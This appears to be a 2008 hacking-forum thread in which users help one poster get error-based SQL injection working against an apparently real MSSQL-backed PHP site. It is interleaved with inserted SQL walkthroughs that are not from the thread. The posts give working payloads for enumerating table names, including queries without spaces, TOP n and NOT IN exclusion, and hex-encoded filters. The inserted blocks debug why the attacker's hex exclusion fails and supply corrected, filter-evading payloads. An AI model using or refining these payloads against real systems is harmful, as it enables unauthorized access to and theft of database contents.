mssql inj help

Discussion in 'Vulnerabilities' started by -=megahertz=-, 22 Mar 2008.

  1. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    With this query
    "1+or+1=(SELECT+1+TOP+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--"
    it shows
    Incorrect syntax near the keyword 'TOP'

    What is my mistake?
     
  2. ~X3RiX~

    ~X3RiX~ Banned

    Joined:
    14 Mar 2008
    Messages:
    22
    Likes Received:
    7
    Reputations:
    -5
    use

    http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
     
  3. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    "1+or+1=(SELECT+max(TABLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES)--"
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    You can inject the query without using any spaces at all:
    or(1=(select(max(table_name))from[information_schema].tables))

    [ cash ] ;)
     
    2 people like this.
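The whitespace-free query from this post, run end to end as an added example that is not from the thread or any of its posters: a page query built by string concatenation on a throwaway SQL Server database (the table and column names are made up), the payload going through it, the conversion error that carries the table name out, and the typed-parameter form that stops it.

```sql
-- Added example (not from the thread). A throwaway database, a page query
-- built by string concatenation the way a PHP mssql_query() page would
-- build it, the whitespace-free payload from the post above, and the
-- typed-parameter form. Table and column names are made up.
CREATE TABLE dbo.news (id INT PRIMARY KEY, title NVARCHAR(100));
INSERT INTO dbo.news (id, title) VALUES (1, N'hello');
GO

DECLARE @id NVARCHAR(200), @sql NVARCHAR(500);

-- The untrusted "id" parameter after URL decoding ('+' became a space).
-- Apart from the space after the number nothing is separated by
-- whitespace: parentheses and [brackets] end the tokens, and no quotes
-- or commas are needed.
SET @id = N'1 or(1=(select(max(table_name))from[information_schema].tables))';

-- Vulnerable construction: the parameter is pasted into the statement.
SET @sql = N'SELECT title FROM dbo.news WHERE id=' + @id;
PRINT @sql;
EXEC (@sql);
-- The subquery yields an nvarchar; to compare it with the int 1 SQL Server
-- converts it to int and fails, and the error text carries the name (on
-- SQL Server 2005+: "Conversion failed when converting the nvarchar value
-- 'news' to data type int."; the 2000 wording differs). PHP's mssql_query()
-- relays that text, which is what the "Warning:" lines in this thread are.
GO

-- Hardened construction: a typed parameter. The input is converted to INT
-- by the application before it gets here, so the payload string can never
-- reach the parser as SQL.
DECLARE @idInt INT;
SET @idInt = 1;
EXEC sp_executesql N'SELECT title FROM dbo.news WHERE id=@id', N'@id INT', @id = @idInt;
```

In a database that holds only `dbo.news`, `max(table_name)` is `news`, so that is the name the error text leaks; on the target in this thread the same position was taken by `syssegments`.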
  5. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    thanks, Anatoly, that helped
     
    1 person likes this.
  6. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    Me again.
    1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments')))--
    outputs
    'syssegments'
    So I do this
    1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','syssegments')))--
    and it outputs
    'syssegmentssyssegments'
    and in the next query it already outputs
    'syssegmentssyssegmentssyssegmentssyssegments'
    and so on
     
  7. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    TABLE_NAME+NOT+IN+('syssegments','syssegments','syssegmentssyssegments'...etc)))--
    that is how you find out all the tables))
    then the same for the columns, and you build the query to the db))
     
  8. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    I know that is how it should be done.
    The problem is that it simply does this:
    syssegments
    syssegmentssyssegments
    syssegmentssyssegmentssyssegmentssyssegments
    syssegmentssyssegmentssyssegmentssyssegmentssyssegmentssyssegments
    ...
    That should not happen.
     
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    -=megahertz=-, show the full result of running the query
     
  10. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    separate them with ';'
     
  11. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Use 0x + hex encoding inside the not in.
     
  12. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    Here is the query
    id=1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','syssegmentssyssegments','syssegmentssyssegmentssyssegments')))--

    and the response
    Warning: mssql_query() [function.mssql-query]: message: Invalid column name 'syssegmentssyssegmentssyssegmentssyssegmentssyssegmentssyssegments'. (severity 16)
    Warning: mssql_query() [function.mssql-query]: Query failed
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
     
  13. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)))--

    then

    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+2+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)))--

    then

    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+3+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)))--

    and so on
     
    1 person likes this.
  14. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    message: Invalid column name, i.e. the column name is wrong...
    'syssegmentssyssegmentssyssegmentssyssegmentssyssegmentssyssegments', hmm, maybe the admins are perverts who name tables like that??
     
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ReVOLVeR, you are talking nonsense; the script simply strips the quotes, and most likely the commas too, while processing the query
     
  16. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    I tried what scipio told me
    the response
    Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'TOP'. (severity 15)
    Warning: mssql_query() [function.mssql-query]: Query failed
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    then do:
    (select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473)

    then:
    (select(max(table_name))from[information_schema].tables+where+table_name<>0x7379737365676D656E7473+and+table_name<>the hex-encoded result)

    and so on, keep adding and's
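A scratch-database walkthrough of the two enumeration styles proposed in this thread (the TOP n exclusion from post 13 and the hex-encoded <> exclusion from post 17), added here as an example that is not from the thread or its posters. It also shows a T-SQL type detail worth checking before blaming the filter: INFORMATION_SCHEMA.TABLES.TABLE_NAME is sysname, i.e. nvarchar(128), so a bare 0x literal built from the single-byte form of a name is compared as UTF-16 text and never matches. The three tables are made up, and the database is assumed to contain nothing else.

```sql
-- Added example (not from the thread). Each SELECT is the subquery the
-- attacker would wrap in "1 or 1=(...)"; it is run directly here so the
-- result is visible instead of leaking through a conversion error.
CREATE TABLE dbo.members (id INT);
CREATE TABLE dbo.news (id INT);
CREATE TABLE dbo.syssegments (id INT);   -- stand-in for the name seen in the thread
GO

-- 1) First name: the alphabetically greatest TABLE_NAME. No spaces, quotes
--    or commas are needed.
select(max(table_name))from[information_schema].tables;
-- syssegments

-- 2) Pitfall. 0x7379737365676D656E7473 is 'syssegments' as single-byte
--    characters, but a bare 0x literal is varbinary, and when compared with
--    an nvarchar column it is the literal that gets converted: its bytes
--    are read as UTF-16LE and come out as unrelated characters, never as
--    N'syssegments'. Nothing is excluded and the walk never advances.
select(max(table_name))from[information_schema].tables
where table_name<>0x7379737365676D656E7473;
-- syssegments (again)

-- 3) Fix: make the literal a string. Either cast it (the syntax needs no
--    quotes or commas) or hex-encode the UTF-16LE form, every byte
--    followed by 00.
select(max(table_name))from[information_schema].tables
where table_name<>cast(0x7379737365676D656E7473 as varchar(128));
-- news
select(max(table_name))from[information_schema].tables
where table_name<>0x7300790073007300650067006D0065006E0074007300;
-- news

-- 4) Keep walking by chaining exclusions. != is equivalent to <> in T-SQL
--    and avoids the < and > characters if those get mangled on the way in.
select(max(table_name))from[information_schema].tables
where table_name!=cast(0x7379737365676D656E7473 as varchar(128))
and table_name!=cast(0x6E657773 as varchar(128));   -- 0x6E657773 = 'news'
-- members

-- 5) TOP n variant. TOP without ORDER BY has no defined order, so two
--    requests may disagree about which row is "second"; ORDER BY on both
--    levels makes the n-th name stable. TOP 1 also guarantees the scalar
--    subquery returns exactly one row.
select top 1 table_name from information_schema.tables
where table_name not in(select top 2 table_name from information_schema.tables order by table_name)
order by table_name;
-- syssegments (third name ascending: members, news, syssegments)
```

The hex constants are easy to verify offline: 73 79 73 73 65 67 6D 65 6E 74 73 spells syssegments byte by byte, which is the value quoted in this thread, and the nvarchar form is the same bytes with 00 after each one.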
     
  18. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    Anyway, with hex it only ever outputs
    (0x7379737365676D656E7473)syssegments
     
    #18 -=megahertz=-, 22 Mar 2008
    Last edited: 22 Mar 2008
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    post the query you are using and the full error
     
  20. -=megahertz=-

    -=megahertz=- Elder

    Joined:
    23 May 2007
    Messages:
    79
    Likes Received:
    16
    Reputations:
    1
    1+or+1=(select(max(table_name))from[information_schema].tables+where+table_name+0x7379737365676D656E7473+and+table_name+0x7379737365676d656e7473+and+table_name+0x7379737365676d656e7473+and+table_name+0x7379737365676d656e7473)--

    Instead of <> I put + because it was giving an error

    Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
    Warning: mssql_query() [function.mssql-query]: message: Line 5: Incorrect syntax near '0x7379737365676d656e7473'. (severity 15)
    Warning: mssql_query() [function.mssql-query]: Query failed
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource
     